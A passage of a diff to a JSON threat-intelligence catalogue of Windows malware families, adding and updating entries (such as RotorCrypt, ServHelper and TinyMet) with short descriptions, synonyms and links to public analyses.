"https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "25b08d2e-f803-4520-9518-4d95ce9f6ed4", + "value": "RogueRobinNET" + }, { "description": "", "meta": { @@ -12789,6 +14663,23 @@ "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", "value": "Roseam" }, + { + "description": "Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt", + "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html", + "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/" + ], + "synonyms": [ + "RotoCrypt", + "Rotor" + ], + "type": [] + }, + "uuid": "f20ef9a8-6ffc-4ef2-98ba-44f6b2eab966", + "value": "RotorCrypt" + }, { "description": "", "meta": { @@ -12972,7 +14863,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", - "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/" + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/" ], "synonyms": [], "type": [] @@ -13035,7 +14932,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf", + "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf" ], "synonyms": [], "type": [] @@ -13076,6 +14974,19 @@ "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", "value": "Sanny" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache", + "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "056eca1f-4195-48c3-81d8-ed554dd1de20", + "value": "SappyCache" + }, { "description": "", "meta": { @@ -13118,11 +15029,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", + "https://www.sangfor.com/source/blog-network-security/1094.html", "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", + "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2", "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", - "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" + "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html", + "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/", + "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/" + ], + "synonyms": [ + "DBGer", + "Lucky Ransomware" ], - "synonyms": [], "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", @@ -13159,7 +15077,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", + "https://securitykitten.github.io/2016/11/15/scanpos.html", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware" ], "synonyms": [], @@ -13322,6 +15240,40 @@ "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", "value": "Serpico" }, + { + "description": "ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.\r\n\r\nProofPoint noticed two distinct variant - \"tunnel\" and \"downloader\" (citation):\r\n\"The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.\"\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", + "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", + "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cebfa7af-8c31-4dda-8373-82893c7f43f4", + "value": "ServHelper" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer", + "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/", + "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", + "https://securelist.com/operation-shadowhammer/89992/", + "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", + "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb", + "value": "shadowhammer" + }, { "description": "", "meta": { @@ -13436,6 +15388,19 @@ "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", "value": "Shim RAT" }, + { + "description": "SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07470989-faac-44fb-b505-1d5568b3c716", + "value": "SHIPSHAPE" + }, { "description": "", "meta": { @@ -13531,8 +15496,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", "http://www.intezer.com/silenceofthemoles/", + "https://www.group-ib.com/resources/threat-research/silence.html", "https://securelist.com/the-silence/83009/", - "https://www.group-ib.com/resources/threat-research/silence.html" + "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/" ], "synonyms": [ "TrueBot" @@ -13672,6 +15638,19 @@ "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", "value": "Slingshot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1bc01fca-9a1e-4669-bd9d-8dd29416f9c1", + "value": "SLUB" + }, { "description": "", "meta": { @@ -13906,7 +15885,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", "https://attack.mitre.org/wiki/Software/S0157", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", + "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" ], "synonyms": [ "denis" @@ -13916,6 +15897,19 @@ "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", "value": "SOUNDBITE" }, + { + "description": "SPACESHIP searches for files with a specified set of file extensions and copies them to\r\na removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive,\r\nwhich could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is\r\nthen used to steal documents from the air-gapped system, copying them to a removable drive inserted\r\ninto the SPACESHIP-infected system", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "813e2761-6d68-493f-846b-2fc86d2e8079", + "value": "SPACESHIP" + }, { "description": "", "meta": { @@ -13968,7 +15962,7 @@ "synonyms": [], "type": [] }, - "uuid": "552745f4-6702-47a5-b517-9b099937573f", + "uuid": "", "value": "win.spynet_rat" }, { @@ -13989,7 +15983,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -14065,6 +16059,34 @@ "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", "value": "StarsyPound" }, + { + "description": "Potentially unwanted program that changes the startpage of browsers to induce ad impressions.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage", + "https://www.bleepingcomputer.com/virus-removal/remove-search-searchetan.com-chrome-new-tab-page" + ], + "synonyms": [ + "Easy Television Access Now" + ], + "type": [] + }, + "uuid": "033dbef5-eb51-4f7b-87e6-6dc4bef72841", + "value": "StartPage" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", + "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea", + "value": "StealthWorker Go" + }, { "description": "", "meta": { @@ -14090,6 +16112,23 @@ "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", "value": "Stinger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop", + "https://securelist.com/keypass-ransomware/87412/", + "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/" + ], + "synonyms": [ + "Djvu", + "KeyPass" + ], + "type": [] + }, + "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", + "value": "STOP Ransomware" + }, { "description": "", "meta": { @@ -14139,7 +16178,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", - "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" + "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", + "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], "type": [] @@ -14165,9 +16205,16 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox", + "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1", + "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf", + "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim", + "https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us" + ], + "synonyms": [ + "Bayrob", + "Nivdort" ], - "synonyms": [], "type": [] }, "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", @@ -14273,7 +16320,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -14372,7 +16419,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", - "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" + "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html", + "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1" ], "synonyms": [ "simbot" @@ -14460,6 +16508,34 @@ "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", "value": "TDTESS" }, + { + "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot", + "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/" + ], + "synonyms": [ + "FINTEAM" + ], + "type": [] + }, + "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", + "value": "TeamBot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal", + "https://twitter.com/WDSecurity/status/1105990738993504256" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aaa05037-aee1-4353-ace1-43ae0f558091", + "value": "TefoSteal" + }, { "description": "", "meta": { @@ -14517,6 +16593,20 @@ "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", "value": "Terminator RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", + "https://www.alienvault.com/blogs/labs-research/internet-of-termites" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c0801a29-ecc4-449b-9a1b-9d2dbde1995d", + "value": "Termite" + }, { "description": "", "meta": { @@ -14662,6 +16752,21 @@ "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", "value": "TinyLoader" }, + { + "description": "TinyMet is a meterpreter stager.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" + ], + "synonyms": [ + "TiniMet" + ], + "type": [] + }, + "uuid": "075c6fa0-e670-4fe1-be8b-b8b13714cb58", + "value": "TinyMet" + }, { "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", "meta": { @@ -14791,33 +16896,40 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", - "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", - "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", + "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", - "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", @@ -14847,11 +16959,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://dragos.com/blog/trisis/TRISIS-01.pdf" + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf" ], "synonyms": [ "HatMan", @@ -14868,7 +16981,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", "https://github.com/5loyd/trochilus/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://asert.arbornetworks.com/uncovering-the-seven-pointed-dagger/", + "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" ], "synonyms": [], @@ -14883,7 +16997,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", - "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/" + "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/", + "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", + "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", + "https://support.kaspersky.com/13059" ], "synonyms": [ "Shade" @@ -14922,7 +17039,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" ], "synonyms": [], "type": [] @@ -14972,6 +17090,22 @@ "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", "value": "UDPoS" }, + { + "description": "Information stealer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer", + "https://twitter.com/malwrhunterteam/status/1096363455769202688", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Usteal" + ], + "synonyms": [ + "Usteal" + ], + "type": [] + }, + "uuid": "a24bf6d9-e177-44f2-9e61-8cf3566e45eb", + "value": "UFR Stealer" + }, { "description": "", "meta": { @@ -15018,7 +17152,7 @@ "synonyms": [], "type": [] }, - "uuid": "ff80f82d-2556-4cda-8cf2-aa6b21d59dc9", + "uuid": "", "value": "win.unidentified_005" }, { @@ -15171,18 +17305,6 @@ "uuid": "799921d7-48e8-47a6-989e-487b527af37a", "value": "Unidentified 032" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" - ], - "synonyms": [], - "type": [] - }, - "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", - "value": "Unidentified 033" - }, { "description": "", "meta": { @@ -15280,19 +17402,6 @@ "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", "value": "Unidentified 045" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", - "https://twitter.com/DrunkBinary/status/1006534471687004160" - ], - "synonyms": [], - "type": [] - }, - "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", - "value": "Unidentified 046" - }, { "description": "RAT written in Delphi used by Patchwork APT.", "meta": { @@ -15306,19 +17415,6 @@ "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", "value": "Unidentified 047" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", - "https://twitter.com/DrunkBinary/status/1002587521073721346" - ], - "synonyms": [], - "type": [] - }, - "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", - "value": "Unidentified 048 (Lazarus?)" - }, { "description": "", "meta": { @@ -15370,6 +17466,47 @@ "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", "value": "Unidentified 053 (Wonknu?)" }, + { + "description": "Unnamed downloader for win.wscspl as described in the 360ti blog post.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_055", + "https://www.freebuf.com/articles/database/192726.html", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b001ebb7-5d33-4972-96cc-56f9549dff27", + "value": "Unidentified 055" + }, + { + "description": "Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_057", + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1b8e86ab-57b2-4cd9-a768-a7118b4eb4be", + "value": "Unidentified 057" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_058", + "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat", + "https://securelist.com/the-return-of-the-bom/90065/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", + "value": "Unidentified 058" + }, { "description": "", "meta": { @@ -15438,8 +17575,10 @@ "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" ], "synonyms": [ @@ -15456,8 +17595,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", + "https://www.circl.lu/pub/tr-25/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193&sid=9fe4a57263c91a8b18bc43ae23afc453", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", @@ -15478,11 +17619,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", + "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", + "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", - "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", - "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Catch", @@ -15494,6 +17636,22 @@ "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", "value": "Vawtrak" }, + { + "description": "Delphi-based ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker", + "https://twitter.com/malwrhunterteam/status/1095024267459284992", + "https://twitter.com/malwrhunterteam/status/1093136163836174339" + ], + "synonyms": [ + "Vega" + ], + "type": [] + }, + "uuid": "704bb00f-f558-4568-824c-847523700043", + "value": "VegaLocker" + }, { "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", "meta": { @@ -15526,7 +17684,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + 